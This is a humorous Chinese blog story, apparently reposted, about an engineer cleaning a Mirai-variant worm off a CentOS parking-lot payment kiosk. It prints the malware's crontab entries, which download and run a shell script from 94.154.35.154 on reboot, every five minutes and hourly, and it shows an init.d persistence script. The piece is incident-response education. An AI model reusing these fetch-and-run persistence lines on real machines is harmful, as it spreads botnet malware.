搜索到
1
篇与
网安故事
的结果
-
重生之我在停车场排查蠕虫病毒 免责声明:文章搬运狗头信安,只是觉得有意思,没有恶意搬运,如有侵权,联系删除0x01 重生之旅那一天,我失去了一切。原来人生真的是一场梦吗?所有的努力、挣扎与坚守,到头来只是服务器日志里一串即将被覆盖的数据。当Mirai蠕虫的触手以摧枯拉朽之势横向撕开内网,我看着监控面板上一台接一台失守的机器由绿转红,最终全军覆没。那一刻,我知道,我守护的世界沦陷了。“没用的FW,明天不用来了。”项目经理的声音冰冷地敲碎了最后一丝幻想我生无可恋地瘫在床上,泪水无声地浸湿了眼角如果……如果能再给我一次机会……意识,在悔恨的尽头逐渐朦胧“大鸿!醒醒!上班别摸鱼了!”一个激灵,我猛地抬起头。经理正站在我工位前,脸上带着一丝……笑容?“快去趟现场,有个客户被通报了,说有台机器感染了病毒,你去看看怎么回事”我愣住了,脱口而出:“经理,您昨天不是让我……找人事办离职吗?”“什么离职?睡糊涂了吧!”经理哭笑不得,“赶紧的,现场是个停车场,网络环境简单,就几台设备。”“停车场?”我下意识地反驳,“那点设备直接重装不就行了?”“你懂什么,人到现场代表我们的态度!要重视客户,知道吗?别废话了,快过去!”我一时语塞。经理的态度怎么一百八十度大转弯?昨天的雷霆之怒,难道只是一场噩梦?正当我恍惚时,隔壁工位传来同事的抱怨:“怎么又周末团建啊?烦不烦,还非得去轰趴别墅,五六十号人挤一块,根本就是无效社交!”轰趴别墅?!这个词像一道闪电劈进我的脑海这不是……上周才发生过的事情吗?我猛地看向电脑屏幕的右下角——11月11日我……回到了一周前?!0x02 再次相遇究竟发生了什么?等我回过神来,冰凉的风正吹在脸上我站在一个空旷的停车场门口,四周是略带锈蚀的栏杆和寥寥几辆蒙尘的汽车“你就是鸿工吗?快进来!”一声叫喊把我从翻腾的思绪中猛地拽出我循声望去,一个身材高大、长相酷似明星Van的帅气男子,正站在岗亭边焦急地朝我招手。那一瞬间,复杂的情绪涌上心头——激动、难以置信、还有一丝宿命般的寒意我穿过马路,几乎是朝他飞奔过去。“你可算来了,鸿工!”他一把拉住我,语气里混杂着求助与抱怨,“快帮我们看看,这到底咋回事啊?我们就一个破停车场,怎么会中什么蠕虫病毒?平时鬼影都没几个,抬杆缴费全是自助的就算真中了又能怎么样?这儿连个数据库都没有,难道偷走停车记录去卖钱吗?”我听出了他话里的潜台词:上面大惊小怪,给他找了麻烦“蠕虫病毒的目的不一定是你这里的数据,”我一边跟着他往里走,一边解释,声音因为某种紧迫感而有些发干,“它们会像瘟疫一样自我复制,横向移动,把感染的机器变成‘肉鸡’——也就是被远程控制的傀儡。”“肉鸡?”他愣了一下,随即眼睛竟亮了起来,“这不挺好吗?肉质细嫩,好吃!”我有些无语地看了他一眼,没再接这个话茬。“我们先看现场吧。网络环境应该不复杂吧?都有些什么设备?”“简单得很!”他掰着手指数,“一台企业级路由器、一台联网的监控摄像头,还有这台缴费的自助终端机。就没了。”“确实简单。”我走到那台孤零零立着的自助机前,灰色的金属外壳在昏暗的光线下显得有些冰冷。“这台机器是什么系统?”“听说是那个……森头OS(CentOS)?”“CentOS。”我纠正道,心跳没来由地快了一拍,“路由器和摄像头固件特殊,感染概率相对低。八成问题就出在这台有完整操作系统的终端上。我们先从它查起。”他转身钻进旁边的设备间,一阵翻找后,抱出一台落满灰尘的显示器,还有键盘鼠标。一阵手忙脚乱的接线后,自助机那略显陈旧的界面终于投射在屏幕上。我深吸一口气,坐了下来。指尖敲击键盘,命令符在黑底窗口上闪烁,敲出:netstat -tanpu命令回车。一长串网络连接列表刷地铺满屏幕。我的目光快速扫描着本地端口与外部地址。突然,我的手指停住了。列表之中,一个异常的远程IP赫然在列:'94.154.35.153'“94”开头的IP段。不像是大陆的IP地址。一种冰冷的熟悉感,顺着脊椎爬了上来。我强行压下悸动,迅速将这个IP复制下来,粘贴到微步在线的威胁情报查询框里。敲下回车。页面跳转。刺目的 红色警告界面 ,瞬间占满了整个屏幕。“果然是恶意IP……”我喃喃自语,滚动鼠标滚轮,目光急切地扫过那些关联的威胁标签、历史活动记录和家族信息。下一秒,我的呼吸骤然停止。瞳孔急剧收缩。屏幕上,那个我化成灰都认得的名字,正无声地散发着狞笑般的幽光—— 【Mirai蠕虫】 是他。怎么……又是他。 Mirai 蠕虫病毒!!!冰冷的汗水,瞬间浸湿了我的后背。那不是噩梦的残留,那是提前写好的 死亡通知 ,又一次,递到了我的面前。0x03 恶斗与追寻那天的回忆再次涌上心头——就是因为他,我被项目经理当众斥为fw;就是因为他,我失去了一切。如今再度相遇,这难道是上天的安排?安排我再一次被他凌辱……等等,不对。如今我已穿越重生,这难道……是上天给我的机会?给我一次战胜他的机会?上一世,我明明已经清除了恶意文件,连他的持久化计划任务也删得干干净净。可为什么他能一次又一次复活?我在键盘上敲入:crontab -l显示器上赫然显出:@reboot for t in curl wget; do T=/tmp/.s$$;if $t http://94.154.35.154/shell.sh>$T 2>/dev/null && [ -s $T ]; then sh $T&; rm -f $T; break; fi; rm -f $T; done; /tmp/uraskid skidstart——每次服务器重启,就会从 94.154.35.154 重新下载恶意脚本。*/5 * * * * ps | grep uraskid | grep -v grep >/dev/null || (for t in curl wget; do T=/tmp/.s$$; if $t http://94.154.35.154/shell.sh>$T 2>/dev/null && [ -s $T ];then sh $T&; rm -f $T; break; fi;rm -f $T; done; /tmp/uraskid skidstart)——每5分钟检查进程是否存在,没有就重新拉取,这是“看门狗”。@hourly for t in curl wget; do T=/tmp/.s$$; if $t http://94.154.35.154/shell.sh>$T 2>/dev/null && [ -s $T ]; then sh $T&; rm -f $T; break; fi; rm -f $T; done; /tmp/uraskid skidstart——每小时再来一次,三重保险。这种招数,对我已经没用。"crontab -r"——计划任务,一键清空。再补两刀:'rm -f /tmp/.s* rm -f /tmp/uraskid*执行文件、临时脚本,统统干掉。再次 crontab -l,果然空空如也。……上一世,我就是走到这里,以为自己赢了。可没想到,这个该死的 Mirai 变种就像有无限复活币——我杀一次,它活一次。究竟为什么……等等——难道……他用了那一招?不可能啊,一个蠕虫病毒,怎么会这种手段?我迅速敲入:cd /etc/init.d/ ls一个文件名跳进眼里:uraskid它不该出现在这里。cat /etc/init.d/uraskid果然——他把自己做成了服务启动项。只要系统重启,这个脚本就会自动执行,重新部署一切。我冷笑一声,敲出"rm -f /etc/init.d/uraskid"重启服务器。持续监测十分钟,再没有外连那个 IP。——这一次,我终于赢了。哈哈哈哈哈......我再也不是他们口中的……那个fw了。0x04 消逝"握载液补时仁闷抠种の拿鸽five了!"叽里咕噜说啥呢?上班时间睡觉,怪不得你是个fw呢!扣200,赶紧去HR那儿办离职手续,明天回家睡个够吧!“经、经理……什么手续啊?”“什么手续?你还好意思问!昨天公司的脸全都被你丢完了!一个破蠕虫病毒都处置不了,赶紧走人!”我瞪大双眼,目光落在桌上那盒吃了一半的拼好饭。这一瞬间——我似乎明白了。
